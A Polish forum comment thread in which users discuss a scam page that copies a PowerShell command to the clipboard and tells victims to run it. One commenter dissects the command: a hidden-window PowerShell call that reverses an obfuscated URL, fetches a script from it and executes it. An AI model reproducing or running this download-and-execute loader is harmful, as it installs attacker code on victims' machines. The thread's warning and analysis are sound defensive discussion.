Komentarze (15)

sierzant_armii_12_malp

@PanNiepoprawny Uff, jestem odporny. Nie mam klawisza Windows na swojej klawiaturze

NiebieskiSzpadelNihilizmu

@PanNiepoprawny o co za chuje Z ciekawości- co ci ten skrypt wkleił do schowka? Masz gdzieś tę komendę?

PanNiepoprawny

@NiebieskiSzpadelNihilizmu jakiś ciąg cyfr i chyba liter. Możesz wejść na stronę i sprawdzić

AliGi

@PanNiepoprawny czy to ten ciąg cyfr i liter?

5P13RD4L4J 5L3D21U

bojowonastawionaowca

@PanNiepoprawny ostatnio w webinarze otwartym Sekuraka o tym mówili

PanNiepoprawny

@bojowonastawionaowca i co powiedzieli?

Vimez

@PanNiepoprawny żeby nie klikać

PanNiepoprawny

@Vimez mądrzy ludzie ( ͡° ͜ʖ ͡°)

PanNiepoprawny

@Gustawff pokazuje okienko do uruchamiania komend

Trawienny

Ale to jest prymitywne (choć podejrzewam, że skuteczne). To skrypt PowerShellowy, który łączy się z ich stroną. Ale żeby nie było tak wprost to:


  1. Losowe litery skryptu zostały zamienione na wielkie litery (amanda99 SkONT KliKaSh?)

  2. docelowy adres został podany w skrypcie wspak a następnie odwrócony

  3. finalnie na przygotowany adres wysyłany jest GET

b55db096-a8bc-4868-9399-62e2597c3ab1
korfos

@Trawienny A ten losowy ciąg znaków to nie jest kodowany w base64? Po wklejeniu powinien się on z automatu odkodować i odpalić skrypt powershella pobierający jakiś syf.

Trawienny

@korfos który losowy ciąg znaków? Tu nie ma żadnego losowego ciągu znaków. To pokolei:


  1. Powershell - wywołanie PowerShella

  2. -nop - przełącznik noprofile

  3. -w hidden - przełącznik windowstyle, ukrycie okna

  4. -c - przełącznik command, wywołanie komendy

  5. $r='moc.fodinel//:sptth'.tochararray(); - wrzucenie linka do adresu [tu jest adres do strony scamowej, ale wole go nie podawać bo jeszcze ktoś kliknie] do zmiennej $r w formie odwróconej macierzy

  6. [array]::reverse($r) - odwrócenie odwróconej macierzy

  7. $u=($r -join '') - zamiana macierzy na string i wrzucenie do zmiennej $u

  8. [scriptblock]::create((invoke-restmethod $u)).invoke() - wywołanie bloku skryptu i strzelenie GETem do adresu znajdującego się w zmiennej $u

korfos

@Trawienny aha, czyli to trochę inny prostszy mniej ukryty atak.

Zaloguj się aby komentować